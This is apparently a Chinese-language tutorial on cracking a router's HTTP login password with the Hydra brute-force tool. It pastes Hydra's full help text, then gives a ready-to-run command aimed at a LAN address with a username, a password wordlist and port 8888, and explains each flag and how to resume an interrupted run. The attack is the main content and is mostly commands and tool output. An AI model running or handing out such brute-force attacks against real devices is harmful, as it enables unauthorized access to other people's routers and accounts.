hydra 是个网络协议暴力破解工具 ，。。支持很多协议 下面说下怎么使用其破解路由器密码

[root ~]# hydra

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]] Options:   -R        restore a previous aborted/crashed session   -S        perform an SSL connect   -s PORT   if the service is on a different default port, define it here   -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE   -p PASS  or -P FILE  try password PASS, or load several passwords from FILE   -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help   -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login   -u        loop around users, not passwords (effective! implied with -x)   -C FILE   colon separated "login:pass" format, instead of -L/-P options   -M FILE   list of servers to be attacked in parallel, one entry per line   -o FILE   write found login/password pairs to FILE instead of stdout   -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)   -t TASKS  run TASKS number of connects in parallel (per host, default: 16)   -w / -W TIME  waittime for responses (32s) / between connects per thread   -4 / -6   prefer IPv4 (default) or IPv6 addresses   -v / -V   verbose mode / show login+pass combination for each attempt   -U        service module usage details   server    the target server (use either this OR the -M option)   service   the service to crack. Supported protocols: cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh svn teamspeak telnet[s] vmauthd vnc xmpp   OPT       some service modules need special input (use -U to see module help) Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy. Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes.  Newest version available at http://www.thc.org/thc-hydra The following services were not compiled in: sapr3 afp oracle. Examples:   hydra -l john -p doe 192.168.0.1 ftp   hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN   hydra -l admin -P pass.txt http-proxy://192.168.0.1   hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

  针对那些在 http 头里发送认证消息的

  也就是浏览器弹出个窗叫你登录的那种，。。

hydra  -l admin -P /root/pass.txt -f -V -e nsr -s 8888 -t 1  192.168.7.254 http-get

 -l 指定一个用户名

-L 使用用户名字典

-P 使用密码字典

-f 登录成功了 退出破解

 -e nsr 也就是尝试 密码为空 密码和用户名相同  密码是用户名反写的  要破解的用户名比较多的时候 比较适用

-t 一个 host 并发连接数

-s 指定端口 如果不是默认的话

http-get  使用 http GET 方法

-V 显示详细信息 。、

破解的时候如果遇到了太多的错误 就会停止破解。。

中途可以Ctrl+C  终止  下次继续破解 、、